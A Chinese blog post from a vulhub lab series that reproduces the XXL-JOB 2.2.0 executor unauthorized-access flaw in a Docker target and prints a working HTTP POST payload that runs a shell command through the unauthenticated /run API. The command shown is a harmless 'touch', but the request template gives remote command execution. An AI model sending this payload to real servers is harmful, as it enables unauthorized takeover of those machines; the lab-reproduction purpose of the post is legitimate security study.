vulhub漏洞复现76_XXL-JOB

最新推荐文章于 2024-04-23 10:22:31 发布
最新推荐文章于 2024-04-23 10:22:31 发布
阅读量548 收藏
点赞数
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122916314
版权

XXL-JOB executor 未授权访问漏洞

漏洞详情

XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。

参考链接:

- https://mp.weixin.qq.com/s/jzXIVrEl0vbjZxI4xlUm-g

- https://landgrey.me/blog/18/

- https://github.com/OneSourceCat/XxlJob-Hessian-RCE

环境搭建

靶场:192.168.4.10_ubuntu

执行如下命令启动2.2.0版本的XXL-JOB:

#docker-compose up -d

环境启动后,访问`http://your-ip:8080`即可查看到管理端(admin),访问`http://your-ip:9999`可以查看到客户端(executor)。

漏洞复现

直接向客户端(executor)发送如下数据包,即可执行命令:

```

POST /run HTTP/1.1

Host: your-ip:9999

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

Connection: close

Content-Type: application/json

Content-Length: 365

{

  "jobId": 1,

  "executorHandler": "demoJobHandler",

  "executorParams": "demoJobHandler",

  "executorBlockStrategy": "COVER_EARLY",

  "executorTimeout": 0,

  "logId": 1,

  "logDateTime": 1586629003729,

  "glueType": "GLUE_SHELL",

  "glueSource": "touch /tmp/success",

  "glueUpdatetime": 1586699003758,

  "broadcastIndex": 0,

  "broadcastTotal": 0

}

```

`touch /tmp/success`已成功执行:

 另外,低于2.2.0版本的XXL-JOB没有RESTful API,我们可以通过[Hessian反序列化](https://github.com/OneSourceCat/XxlJob-Hessian-RCE)来执行命令。

Revenge_scan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XXL-JOB executor 未授权访问漏洞
锋刃科技的博客
12-23 1633
漏洞概述 XXL-JOB是一个轻量级分布式任务调度平台。默认情况下XXL-JOB的API接口没有配置认证措施,未授权的攻击者可构造恶意请求,触发反序列化,造成远程执行命令 影响版本 XXL-JOB <= 2.2.0 环境搭建 进入目录 cd vulhub-master/xxl-job/unacc/ 启动2.2.0版本的XXL-JOB docker-compose up -d http://your-ip:8080是管理端(admin) http://your-ip:.
XXL-JOB executor未授权访问漏洞
jammny
12-04 8396
漏洞详情 XXL-JOB是一个轻量级分布式任务调度平台。默认情况下XXL-JOB的Restful API接口或RPC接口没有配置认证措施,未授权的攻击者可构造恶意请求,造成远程执行命令,直接控制服务器。 漏洞影响 XXL-JOB <= 2.2.0 漏洞分析 XXL-JOB的Restful API分为两种,一个调度中心Restful API,一个执行器Restful API。其中在执行器Restful API的任务触发声明中,发送请求的数据格式为: 地址格式: {执行器内嵌服务..
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
小司机的奥拓
04-23 1374
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅我也会不定期再中间更新复现文章链接目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者。
xxl-job-springboot_xxl-job_
10-03
xxl-job的源代码包,springboot-xxl-job
xxl-job适配达梦数据库
02-02
xxl-job适配达梦数据库(DM8),附带数据库脚本,用户名密码自行修改,SCHEMA=xxl_job
xxl-job-executor:与xxl-job-executor的集成
04-19
xxl-job-executor的gin中间件背景xxl-job-executor-go是xxl-job的golang执行器,可以独立运行,有时候我们要与项目或者框架(如:gin框架)集成起来合并为一个服务,本项目因此而生。执行器项目地址与gin集成示例...
XXL-JOB反弹shell利用工具(xxl-jobExploitGUI)
11-03
工具实现了XXL-JOB默认accessToken权限绕过漏洞的单个检测、批量检测、一键反弹shell功能,后续会持续更新优化,添加POC检测等。(由于传播、利用此资源所提供的信息或者工具而造成的任何直接或者间接的后果及损失,...
XXL-JOB分布式任务调度系统培训PPT
08-09
"XXL-JOB分布式任务调度系统培训PPT" XXL-JOB分布式任务调度系统是当前 Java 生态中的一种流行的分布式任务调度系统。它提供了多种功能特性,如支持 cron 表达式、支持多种任务类型、支持任务优先级、支持任务依赖...
当下的网络安全行业前景到底怎么样?还能否入行?
2201_75735270的博客
11-16 92
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
漏洞库】XXL-JOB executor 未授权访问漏洞导致RCE
yuan_boss的博客
11-03 872
XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。注意,我们编写的EXP只能用一次,如果第二次用其他命令就无法命令执行了,除非目标的服务重启,我们才能执行其他的命令,不然只能一直使用第一次用的EXP。该问题类似于将一台Mysql、Redis实例,不设置密码并开放给公网,严格来说不能因此说Mysql、Redis有漏洞,只需要设置密码即可。复现环境与复现参考链接:https://vulhub.org/#/environments/xxl-job/unacc/
XXL-JOB executor 未授权访问漏洞复现
m0_53603468的博客
12-25 2802
概述 XXL-JOB executor 未授权访问漏洞 XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。 不过XXL-JOB官方版本原生自带了鉴权组件,开启后可保障系统底层通讯安全。因此,正常情况下调度中心与执行器底层通讯是安全
xxl-job 2.2之后版本高版本executor未授权访问漏洞
一个码农的笔记
09-28 6978
xxl-job executor 高版本未授权访问漏洞利用
XXLJOB-2.3.0源码分析之缺陷及建议
第三眼的思绪
03-17 908
core TriggerCallbackThread:start callback做了非空判断添加到callbackParamList中,后又做了callbackParamList非空判断(重复无意义判断) TriggerCallbackThread::callBackQueue 无界队列 XxlJobExecutor:registJobHandler 和 XxlJobExecutor:removeJobThread 没有做验证,可能上一次的jobThre...
未能解析此远程名称_Xxl Job未授权远程代码执行漏洞
weixin_39757626的博客
12-04 846
Xxl Job 受影响的版本存在一个未授权的接口,通过该接口可以反序列化传入的序列化数据。当攻击者传入恶意的序列化数据时,会导致服务器端的任意代码执行,最终成功接管服务器。漏洞名称 :Xxl Job未授权远程代码执行漏洞威胁等级 : 高危影响范围:Xxl Job <= 2.1.0漏洞类型 :远程代码执行利用难度 : 简单 漏洞分析 1Xxl Job组件介绍Xx...
XXL-JOB任务调度中心后台命令执行漏洞
weixin_44304678的博客
12-08 1107
XXL-JOB是一个轻量级分布式任务调度平台,支持通过web页面对任务进行操作,基于Java-spring boot框架开发,利用Maven依赖编译好,开箱即用。XXL-JOB任务调度中心后台存在命令执行漏洞,攻击者可在后台通过写入shell命令任务调度获取服务器控制权限。仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。一旦发生任何违法行为,责任自负。作者对使用该文章导致的任何直接或间接损失不承担任何责任。该文章仅用于授权测试,任何未经授权的测试均属于非法行为。
3.xxl-job实战3.1下拉xxl-job源码
最新发布
05-23
下面是在xxl-job 3.1版本中拉取源码的步骤: 1. 打开xxl-job官网,点击页面右上角的"下载"按钮,在弹出的下载页面中下载xxl-job 3.1版本的源码压缩包; 2. 解压源码压缩包,可以看到源代码的目录结构; 3. 根据自己的需要进行修改和编译,比如修改相关配置文件、实现自定义的JobHandler等; 4. 最后将修改后的代码打包成新的xxl-job jar包,替换掉原来的xxl-job jar包即可。 需要注意的是,如果不是对xxl-job进行二次开发或者修改,建议不要轻易修改源码。这样容易引起兼容性问题,影响系统的稳定性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值